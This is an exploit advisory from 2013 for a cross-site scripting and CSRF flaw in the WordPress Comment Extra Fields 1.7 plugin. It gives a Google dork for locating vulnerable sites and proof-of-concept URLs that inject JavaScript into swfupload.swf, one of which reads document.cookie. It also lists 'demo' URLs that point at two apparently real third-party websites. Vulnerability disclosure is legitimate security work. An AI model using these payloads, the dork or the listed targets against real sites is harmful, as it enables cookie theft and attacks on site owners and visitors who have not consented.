Home / exploits WordPress Comment Extra Fields 1.7 CSRF / XSS
Posted on 01 August 2013
################################################## # Description : Wordpress Plugins - Comment Extra Fields <== XSS # Version : 1.7 # Link : http://wordpress.org/extend/plugins/comment-extra-field/ # Plugins : http://downloads.wordpress.org/plugin/comment-extra-field.1.7.zip # Date : 8-1-2013 # Google Dork : inurl:/wp-content/plugins/comment-extra-field/ # Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com) ################################################## # Description : ================ JavaScript Code injecton (XSRF/XSS) . remote attacker can include a remote Images or exec some JS code. # PoC ===== => XSRF/XSS Injection : http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS');// http://[site]/wordpress/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a> # Demo: ======= http://cscmail.net/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a> http://fitest.sitewalla.com/wp-content/plugins/comment-extra-field/scripts/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>Click me</a> # Thanks ========= CyberSEC Team - TBD - 1337day - PacketStormSecurity
